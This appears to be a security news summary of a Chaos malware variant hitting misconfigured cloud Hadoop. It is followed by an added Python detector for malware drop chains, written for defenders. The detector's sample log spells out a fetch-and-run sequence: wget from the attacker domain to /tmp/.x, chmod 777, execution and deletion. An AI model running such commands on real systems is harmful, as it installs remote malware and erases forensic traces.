thehackernews.com 4/8/2026, 6:51:04 PM · via preferred

Chaos malware variant exploits misconfigured cloud Hadoop

A new Chaos malware variant has emerged that targets misconfigured cloud deployments, expanding beyond its traditional focus on routers and edge devices. Darktrace identified the variant last month on its honeypot network, noting a deliberately misconfigured Hadoop instance enabled remote code execution to drop a Chaos agent.

The 64-bit ELF binary is an updated version of Chaos that reworks several functions while removing SSH-based spreading and router-exploit components, and it now includes a SOCKS proxy to route traffic and conceal malicious activity. Chaos was first documented by Lumen Black Lotus Labs in September 2022 as a cross-platform malware capable of Windows and Linux operations, including remote shell commands, cryptocurrency mining, SSH brute-forcing, and DDoS via multiple protocols.

The attackers behind this variant may be Chinese in origin, a claim Darktrace highlights given the presence of Chinese-language characters and China-based infrastructure. An application used in the attack retrieved a Chaos agent binary from the attacker-controlled domain pan.tenire[.]com, set permissive file access, executed the binary, and then cleaned up to reduce forensic traces.
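The drop-and-clean sequence summarised above (fetch a binary, loosen its permissions, run it, delete it) is something defenders can correlate in process or shell command telemetry from Hadoop worker nodes. The following detector is an added example and is not code from The Hacker News article, Darktrace, or Lumen; the log line layout, the five-minute correlation window, the host names and the sample commands are all constructed for illustration (the defanged domain in the sample is the one named in the article).

```python
"""Correlate a download -> chmod -> execute -> cleanup chain in command logs.

Added example, not from the article. Assumes a simple constructed log format:
"<ISO-8601 timestamp> host=<hostname> pid=<pid> cmd=<command line>".
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample telemetry. Node 3 shows the full dropper chain; node 7 is a
# plain download with no follow-up; node 9 is a routine chmod+run with no fetch.
SAMPLE_LOG = """\
2026-03-11T02:14:03Z host=hdp-node-3 pid=4410 cmd=wget -q http://pan.tenire[.]com/x -O /tmp/.x
2026-03-11T02:14:04Z host=hdp-node-3 pid=4412 cmd=chmod 777 /tmp/.x
2026-03-11T02:14:05Z host=hdp-node-3 pid=4413 cmd=/tmp/.x
2026-03-11T02:14:06Z host=hdp-node-3 pid=4415 cmd=rm -f /tmp/.x
2026-03-11T02:20:00Z host=hdp-node-7 pid=9001 cmd=curl -sO https://example.invalid/pkg.tar.gz
2026-03-11T02:20:09Z host=hdp-node-7 pid=9002 cmd=tar xzf pkg.tar.gz
2026-03-11T03:00:00Z host=hdp-node-9 pid=7000 cmd=chmod 755 /opt/app/run.sh
2026-03-11T03:00:01Z host=hdp-node-9 pid=7001 cmd=/opt/app/run.sh
"""

LINE_RE = re.compile(r"^(?P<ts>\S+) host=(?P<host>\S+) pid=(?P<pid>\d+) cmd=(?P<cmd>.*)$")
FETCH_RE = re.compile(r"\b(?:wget|curl)\b")
URL_RE = re.compile(r"https?://\S+")
OUT_RE = re.compile(r"(?:^|\s)-[Oo]\s+(?P<path>\S+)")      # explicit output file
CHMOD_RE = re.compile(r"\bchmod\s+(?P<mode>\S+)\s+(?P<path>\S+)")
STAGE_ORDER = ("download", "chmod", "execute", "cleanup")


def parse_events(text):
    """Parse log lines into dicts with a real timestamp; skip malformed lines."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        events.append({
            "ts": datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ"),
            "host": m["host"], "pid": int(m["pid"]), "cmd": m["cmd"],
        })
    return events


def download_target(cmd):
    """Return (url, local_path) for a wget/curl fetch, else None.

    Without an explicit -O/-o, both tools default to the URL's last component.
    """
    if not FETCH_RE.search(cmd):
        return None
    url_m = URL_RE.search(cmd)
    if not url_m:
        return None
    url = url_m.group(0)
    out_m = OUT_RE.search(cmd)
    return url, (out_m["path"] if out_m else url.rsplit("/", 1)[-1])


def _executed_path(cmd):
    """Path being run: first token, or the script argument of sh/bash."""
    tokens = cmd.split()
    if not tokens:
        return None
    exe = tokens[1] if tokens[0] in ("sh", "bash") and len(tokens) > 1 else tokens[0]
    return exe[2:] if exe.startswith("./") else exe


def detect_dropper_chains(events, window=timedelta(minutes=5)):
    """Per host, find a fetch whose output file is chmod'ed and executed within
    `window`; note whether the file was then removed. Returns a list of alerts."""
    by_host = defaultdict(list)
    for e in events:
        by_host[e["host"]].append(e)
    alerts = []
    for host, evs in by_host.items():
        evs.sort(key=lambda e: e["ts"])
        for i, e in enumerate(evs):
            dl = download_target(e["cmd"])
            if not dl:
                continue
            url, path = dl
            stages = {"download": e["ts"]}
            for later in evs[i + 1:]:
                if later["ts"] - e["ts"] > window:
                    break
                cmd, tokens = later["cmd"], later["cmd"].split()
                cm = CHMOD_RE.search(cmd)
                if cm and cm["path"] == path and "chmod" not in stages:
                    stages["chmod"] = later["ts"]
                elif "chmod" in stages and "execute" not in stages and _executed_path(cmd) == path:
                    stages["execute"] = later["ts"]
                elif "execute" in stages and tokens and tokens[0] == "rm" and path in tokens:
                    stages["cleanup"] = later["ts"]
                    break
            if {"download", "chmod", "execute"} <= stages.keys():
                alerts.append({
                    "host": host, "url": url, "path": path,
                    "stages": [s for s in STAGE_ORDER if s in stages],
                    "cleanup": "cleanup" in stages,
                })
    return alerts


if __name__ == "__main__":
    for alert in detect_dropper_chains(parse_events(SAMPLE_LOG)):
        print(alert)
```

Requiring the chmod and execution to act on the very file the fetch wrote is what keeps the routine `chmod 755` plus run on node 9 and the bare package download on node 7 out of the alert list; the cleanup stage is recorded rather than required, because the article's point is that the removal reduces forensic traces, so a chain that has already run must still be flagged even if the delete is missed.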


Article by CyberSIXT